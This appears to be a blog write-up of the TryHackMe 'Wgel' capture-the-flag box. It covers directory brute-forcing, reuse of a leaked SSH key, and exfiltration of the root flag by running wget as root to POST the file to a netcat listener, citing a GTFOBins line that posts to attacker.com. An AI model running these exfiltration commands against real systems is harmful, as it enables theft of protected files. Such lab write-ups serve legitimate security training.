---
layout: post
title:  "THM - Wegl"
date:   2020-08-07 18:00:00 +1000
category: hacking
---

## Introduction
*Can you exfiltrate the root flag?*  

Dunno, but since this is a easy rated box I give myself a fighting chance. Let's begin.

## Ports
nmap says we've got 22 (SSH) and 80 (HTTP) only.  

## Webserver
The homepage for the website is just the Apache default page, with one exception - a comment for **Jessie**. So perhaps that's our username.

Gobuster is a place to start:

``
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196 -w /usr/share/wordlists/dirb/common.txt
``

This turns up one interesting directory - sitemap. Checking that we get a whole host of pages; basically an incomplete blog/business site. It's called *unapp*, but that doesn't turn up anything on searchsploit, so let's gobuster in the sitemap directory:

``
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196/sitemap -w /usr/share/wordlists/dirb/common.txt
``

Doing that, we find **.ssh/id_rsa**. Bingo.

## Jessie
Once we've downloaded the ssh key, we can *chmod 600* it and then login:

``
root@kali:/opt/tryhackme/wgel# ssh -i id_rsa jessie@10.10.34.196
``

Then we run *sudo -l*:

{% highlight shell %}
jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
{% endhighlight %}

## Wget
Jessie has got the user flag, and we can run wget as root. What can we do with that? Well, the box hint was about exfiltrating the root flag.

[GTFOBins](https://gtfobins.github.io/gtfobins/wget) says we can exfiltrate files:

>Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use --post-data to send hard-coded data.

>URL=http://attacker.com/  
LFILE=file_to_send  
wget --post-file=$LFILE $URL  

So let's try that:
{% highlight shell %}
jessie@CorpOne:/$ URL=http://10.9.10.123:1234/  
jessie@CorpOne:/$ LFILE=/root/root_flag.txt  
jessie@CorpOne:/$ sudo wget --post-file=$LFILE $URL  
--2020-08-07 07:02:51--  http://10.9.10.123:1234/  
Connecting to 10.9.10.123:1234... connected.  
{% endhighlight %}

And on the receiving end I used netcat:

{% highlight shell %}
root@kali:/opt/tryhackme/wgel# nc -nvlp 1234  
Ncat: Version 7.80 ( https://nmap.org/ncat )  
Ncat: Listening on :::1234  
Ncat: Listening on 0.0.0.0:1234  
Ncat: Connection from 10.10.34.196.  
Ncat: Connection from 10.10.34.196:45494.  
POST / HTTP/1.1  
User-Agent: Wget/1.17.1 (linux-gnu)  
Accept: */*  
Accept-Encoding: identity  
Host: 10.9.10.123:1234  
Connection: Keep-Alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 33  

b1b968b37519ad1daa6408188649263d
{% endhighlight %}

Nice.

